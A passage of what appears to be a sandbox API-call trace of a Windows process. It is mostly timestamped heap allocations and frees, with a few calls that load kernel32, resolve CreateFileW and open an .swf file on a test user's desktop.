RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2540 [0122.664] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c80 | out: hHeap=0x1780000) returned 1 [0122.664] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x43921f0 [0122.664] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c80 [0122.664] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2590 [0122.664] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0122.664] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfba8 [0122.664] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4a8 [0122.664] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2660 [0122.664] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4a8 | out: hHeap=0x1780000) returned 1 [0122.664] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd38 [0122.665] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca610 [0122.665] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25b0 [0122.665] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0122.665] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfbf8 [0122.665] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca568 [0122.665] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2630 [0122.665] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca568 | out: hHeap=0x1780000) returned 1 [0122.665] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfab8 [0122.665] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca640 [0122.665] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8be8 [0122.665] PeekMessageW (in: lpMsg=0x144ebfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebfc) returned 0 [0122.665] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc48 [0122.665] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca658 [0122.665] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2640 [0122.665] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca598 [0122.665] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca760 [0122.665] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2560 [0122.665] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca760 | out: hHeap=0x1780000) returned 1 [0122.665] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf950 [0122.665] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6b8 [0122.665] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2680 [0122.665] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca538 [0122.665] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0122.665] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4c0 [0122.665] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26a0 [0122.665] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4a8 [0122.665] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0122.665] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca550 [0122.665] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26e0 [0122.666] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6d0 [0122.666] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0122.666] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca760 [0122.666] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26f0 [0122.666] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca730 [0122.666] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26f0 | out: hHeap=0x1780000) returned 1 [0122.666] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4d8 [0122.666] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2570 [0122.666] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca670 [0122.666] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2570 | out: hHeap=0x1780000) returned 1 [0122.666] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5b0 [0122.666] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25c0 [0122.666] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6e8 [0122.666] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0122.666] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4f0 [0122.666] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2570 [0122.666] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2570 | out: hHeap=0x1780000) returned 1 [0122.666] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca568 [0122.666] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2690 [0122.666] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca688 [0122.666] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2690 | out: hHeap=0x1780000) returned 1 [0122.666] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9188 [0122.666] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf950 | out: hHeap=0x1780000) returned 1 [0122.666] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6a0 [0122.666] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25a0 [0122.666] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0122.666] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca700 [0122.666] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25d0 [0122.667] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca718 [0122.667] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25d0 | out: hHeap=0x1780000) returned 1 [0122.667] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca778 [0122.667] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25f0 [0122.667] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0122.667] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca490 [0122.667] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2570 [0122.667] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9d0 [0122.667] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2570 | out: hHeap=0x1780000) returned 1 [0122.667] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca868 [0122.667] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2670 [0122.667] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0122.667] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7a8 [0122.667] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2690 [0122.667] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9b8 [0122.667] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2690 | out: hHeap=0x1780000) returned 1 [0122.667] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca928 [0122.667] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25d0 [0122.667] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25d0 | out: hHeap=0x1780000) returned 1 [0122.667] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9e8 [0122.667] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2670 [0122.667] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa00 [0122.667] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0122.667] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x80) returned 0x41a5250 [0122.667] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9188 | out: hHeap=0x1780000) returned 1 [0122.667] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca838 [0122.667] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2570 [0122.668] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2570 | out: hHeap=0x1780000) returned 1 [0122.668] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25f0 [0122.668] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7c0 [0122.668] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0122.668] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca940 [0122.668] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26c0 [0122.668] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25d0 [0122.668] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa18 [0122.668] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca940 | out: hHeap=0x1780000) returned 1 [0122.668] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0122.668] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa18 | out: hHeap=0x1780000) returned 1 [0122.668] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25d0 | out: hHeap=0x1780000) returned 1 [0122.668] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfae0 [0122.668] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2570 [0122.668] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca880 [0122.668] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26c0 [0122.668] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25c0 [0122.668] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca958 [0122.668] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca880 | out: hHeap=0x1780000) returned 1 [0122.668] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0122.668] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca958 | out: hHeap=0x1780000) returned 1 [0122.668] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0122.668] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26d0 [0122.668] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa18 [0122.668] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2590 [0122.668] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2610 [0122.668] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca898 [0122.668] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa18 | out: hHeap=0x1780000) returned 1 [0122.669] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0122.669] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca898 | out: hHeap=0x1780000) returned 1 [0122.669] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0122.669] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2580 [0122.669] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8b0 [0122.669] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2670 [0122.669] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25b0 [0122.669] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca940 [0122.669] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8b0 | out: hHeap=0x1780000) returned 1 [0122.669] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0122.669] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca940 | out: hHeap=0x1780000) returned 1 [0122.669] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0122.669] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25d0 [0122.669] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca880 [0122.669] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26c0 [0122.669] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2670 [0122.669] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca970 [0122.669] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca880 | out: hHeap=0x1780000) returned 1 [0122.669] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0122.669] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca970 | out: hHeap=0x1780000) returned 1 [0122.669] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0122.669] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2700 [0122.669] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8f8 [0122.669] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2670 [0122.669] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2610 [0122.669] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca808 [0122.669] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8f8 | out: hHeap=0x1780000) returned 1 [0122.669] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0122.670] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca808 | out: hHeap=0x1780000) returned 1 [0122.670] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0122.670] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2590 [0122.670] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca808 [0122.670] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26e0 [0122.670] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2710 [0122.670] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca850 [0122.670] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca808 | out: hHeap=0x1780000) returned 1 [0122.670] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0122.670] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca850 | out: hHeap=0x1780000) returned 1 [0122.670] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0122.670] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2670 [0122.670] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8c8 [0122.670] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25a0 [0122.670] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2610 [0122.670] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa18 [0122.670] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8c8 | out: hHeap=0x1780000) returned 1 [0122.670] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0122.670] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa18 | out: hHeap=0x1780000) returned 1 [0122.670] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0122.670] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x772d0000 [0122.670] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8c8 [0122.670] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2610 [0122.671] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0122.671] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca808 [0122.671] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x43ca808, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileW", lpUsedDefaultChar=0x0) returned 12 [0122.671] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca808 | out: hHeap=0x1780000) returned 1 [0122.671] GetProcAddress (hModule=0x772d0000, lpProcName="CreateFileW") returned 0x7733ed10 [0122.671] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8c8 | out: hHeap=0x1780000) returned 1 [0122.671] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0122.671] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc70 [0122.671] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2710 [0122.671] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25b0 [0122.671] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25a0 [0122.671] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2680 [0122.671] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25c0 [0122.671] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26c0 [0122.671] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2610 [0122.671] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20002) returned 0x499a008 [0122.671] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0122.671] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0122.671] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0122.672] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0122.672] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0122.672] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0122.672] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0122.672] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc70 | out: hHeap=0x1780000) returned 1 [0122.672] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\CtmEppS 7Ks0.swf" (normalized: "c:\\users\\fd1hvy\\desktop\\ctmepps 7ks0.swf"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2a0 [0122.672] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2610 [0122.672] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43e9578 [0122.672] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc70 [0122.672] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7d8 [0122.672] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa60 [0122.672] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca988 [0122.672] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26e0 [0122.672] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca988 | out: hHeap=0x1780000) returned 1 [0122.672] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0122.672] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa60 | out: hHeap=0x1780000) returned 1 [0122.672] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa48 [0122.672] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca940 [0122.672] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca988 [0122.672] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25a0 [0122.672] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca988 | out: hHeap=0x1780000) returned 1 [0122.673] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x60) returned 0x43595f0 [0122.673] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x499a008 | out: hHeap=0x1780000) returned 1 [0122.673] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca880 [0122.673] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca910 [0122.673] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca958 [0122.673] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2680 [0122.673] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca958 | out: hHeap=0x1780000) returned 1 [0122.673] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0122.673] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca910 | out: hHeap=0x1780000) returned 1 [0122.673] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca898 [0122.673] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca958 [0122.673] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa78 [0122.673] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2680 [0122.673] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa78 | out: hHeap=0x1780000) returned 1 [0122.673] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0122.673] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca958 | out: hHeap=0x1780000) returned 1 [0122.673] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa78 [0122.673] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca808 [0122.673] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca820 [0122.673] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26a0 [0122.673] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca820 | out: hHeap=0x1780000) returned 1 [0122.673] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0122.673] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca808 | out: hHeap=0x1780000) returned 1 [0122.673] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca970 | out: hHeap=0x1780000) returned 1 [0122.674] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0122.674] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca958 | out: hHeap=0x1780000) returned 1 [0122.674] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca820 | out: hHeap=0x1780000) returned 1 [0122.674] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0122.674] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca808 | out: hHeap=0x1780000) returned 1 [0122.674] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8c8 | out: hHeap=0x1780000) returned 1 [0122.674] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0122.674] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8b0 | out: 